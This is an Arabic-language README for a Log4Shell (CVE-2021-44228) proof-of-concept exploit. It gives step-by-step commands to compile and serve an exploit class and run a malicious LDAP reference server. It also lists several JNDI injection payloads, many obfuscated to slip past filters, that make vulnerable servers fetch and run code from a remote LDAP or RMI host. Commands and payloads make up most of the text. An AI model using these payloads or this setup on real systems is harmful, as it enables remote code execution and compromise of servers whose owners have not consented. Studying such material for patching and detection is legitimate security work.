
Log4j-RCE (CVE-2021-44228) إثبات المفهوم
git clone https://github.com/PwnC00re/CVE-2021-44228-Apache-Log4j-Rce.git
cd apache-log4j-poc/src/main/java
javac Exploit.java
python -m SimpleHTTPServer 8888
cd tools
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"
قم بتشغيل المشروع أخيرًا، وسترى الآلة الحاسبة الخاصة بك محليًا.
نصائح:
يمكنك استخدام JNDI-Injection-Exploit للاستغلال.
على سبيل المثال:
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
توفر عمليات البحث طريقة لإضافة قيم إلى تكوين Log4j في أماكن عشوائية.
الطرق التي تسبب تسربًا في النهاية
LogManager.getLogger().error()
LogManager.getLogger().fatal()
إذا كنت ترغب في إجراء اختبار الصندوق الأسود، أقترح عليك القيام بالمسح السلبي.
استمتع!!!
